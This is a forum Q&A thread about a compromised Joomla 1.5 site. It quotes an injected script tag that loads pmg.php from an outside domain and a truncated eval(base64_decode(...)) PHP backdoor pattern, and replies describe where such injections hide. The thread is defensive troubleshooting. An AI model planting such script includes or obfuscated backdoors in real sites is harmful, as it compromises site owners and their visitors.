# Joomla! 1.5 site fell victim to XSS

Tags: sql, joomla, xss

My Joomla! 1.5 website recently fell victim to what seems to be an XSS attack (I'm a noob when it comes to this stuff)...The following code was injected into the site (somewhere)

```
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>
```

and I'm not sure exactly where. I've searched the database as well as the files, only to find zero results. Is there something obvious I'm missing?

Comment: Did you grep your folders for that text specifically?  I've seen the injection actually create a new sheet that has a huge string of encoded text (which when unencoded reads as the url) - then they include a snippet of php which simply unencodes the encoded text and inserts it into whatever page/module the php code runs from.  In which case you would never see : <script src="http://sweepstakeblahblahblah.com/pmg.php"></script>
 making it impossible to 'track down', check your error logs and see about any errors popping; get NoScript and Firebug and see what JS is being loaded and from where.

Comment: If the link is after the </html> tag then it is probably an edit directly in you template's index.php file (or perhap's Joomla's main index.php file.  If when you turn off javascript the html isn't present then it is probably a javascript file that has been edited - typically they simply append a line or two at the end of one of your template's .js files.The other possibility - if the html is present within the 'component area' ie within your articles is that they have inserted the html directly in every article in your db via an sql injection. What version of Joomla 1.5 is this 1.5.?

Answer (score 2, accepted):

My site also fell victim to this attack, still investigating it.  It is not a XSS attack, your server files were compromised.  Look inside the system template in the index php file and you will find a block of code like this:

```
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb.....>
```

The base64 encode string is php code that does all sorts of nasty things.